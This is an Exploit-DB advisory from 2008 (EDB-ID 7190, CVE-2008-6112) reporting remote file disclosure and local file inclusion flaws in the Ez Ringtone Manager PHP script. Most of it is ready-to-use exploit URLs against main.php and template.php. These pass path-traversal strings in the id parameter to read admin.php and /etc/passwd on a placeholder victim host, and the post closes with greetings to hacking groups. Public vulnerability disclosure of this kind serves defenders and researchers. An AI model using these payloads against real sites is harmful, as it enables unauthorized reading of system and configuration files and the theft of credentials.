Ez Ringtone Manager Multiple Remote File Disclosure Vulnerabilities

2008-11-22T00:00:00
ID EDB-ID:7190
Type exploitdb
Reporter b3hz4d
Modified 2008-11-22T00:00:00

Description

Ez Ringtone Manager Multiple Remote File Disclosure Vulnerabilities. CVE-2008-6112. Webapps exploit for php platform

                                        
                                                    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                                    +
        +            Ez Ringtone Manager Multiple Vulnerabilities            +
        +                                                                    +
        +                      Discovered by b3hz4d                          +
        +                                                                    +
        +                      WwW.DeltaHacking.Net                          +
        +                                                                    +
        +                                                                    +
        +                                                                    +
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                  

                              APA Center of Yazd University   
                                 (https://www.ircert.cc)    

		
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE   : 22 nov 2008
SITE   : WwW.DeltaHacking.Net


#####################################################

APPLICATION  : Ez Ringtone Manager
DOWNLOAD(10$): http://www.scriptsez.net/?action=details&cat=Music%20Libraries&id=1190620143
VENDOR       : http://www.scriptsez.net/
DEMO         : http://demo.scriptsez.net/ringtones/demo.html

#####################################################


[+] vuln    : ./main.php
              ./template.php


               vulnerability is in main.php that included in template.php


[1] Remote File Disclosure:

[~] Exploit : http://victim.com/ringtones/main.php?action=detail&id=../admin.php
              http://victim.com/ringtones/template.php?action=detail&id=../admin.php

[2] Local File Inclusion:

[~] Exploit : http://victim.com/ringtones/main.php?action=detail&id=../../../../../../../../../../../../../etc/passwd
              http://victim.com/ringtones/template.php?action=detail&id=../../../../../../../../../../../../../etc/passwd

##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & snoop-security.com #

##########################################################################################################

# milw0rm.com [2008-11-22]